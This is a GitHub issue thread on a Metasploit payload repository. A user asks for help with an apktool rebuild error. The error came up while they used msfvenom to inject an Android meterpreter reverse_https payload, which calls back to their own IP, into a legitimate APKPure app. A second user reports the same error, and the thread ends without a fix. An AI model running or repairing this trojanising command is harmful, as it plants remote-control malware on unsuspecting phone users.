rapid7 / metasploit-javapayload

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD
87 stars 82 forks source link

Error when i modify an apk #50

Open Impre-visible opened 3 years ago

Impre-visible commented 3 years ago

Hi, i want to modify an apk, so i do that : msfvenom -x APKPure_v3.17.29_apkpure.com.apk -p android/meterpreter/reverse_https LHOST=My_IP LPORT=443 -o apkpure.apk But I have this error :

W: /tmp/d20211107-1355-1vbcgal/original/res/layout-v22/material_timepicker_dialog.xml:2: error: No resource identifier found for attribute 'accessibilityPaneTitle' in package 'android' W: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_72762702050430616616466299950788491245.tmp, p, --forced-package-id, 127, --min-sdk-version, 19, --target-sdk-version, 28, --version-code, 3172901, --version-name, 3.17.29, --no-version-vectors, -F, /tmp/APKTOOL281962750424967257.tmp, -e, /tmp/APKTOOL17564809524669596266.tmp, -0, arsc, -I, /home/imprevisible/.local/share/apktool/framework/1.apk, -S, /tmp/d20211107-1355-1vbcgal/original/res, -M, /tmp/d20211107-1355-1vbcgal/original/AndroidManifest.xml] Error: Unable to rebuild apk with apktool How can i path that

ghis21 commented 1 year ago

Hi, I was also trying to modify an apk and got the same error. "error: No resource identifier found for attribute 'accessibilityPaneTitle' in package 'android'" Did you manage to go about fixing it?

Impre-visible commented 1 year ago

Hi, I was also trying to modify an apk and got the same error. "error: No resource identifier found for attribute 'accessibilityPaneTitle' in package 'android'" Did you manage to go about fixing it?

Saddly, I didn't managed to fix it, don't know why, sorry for u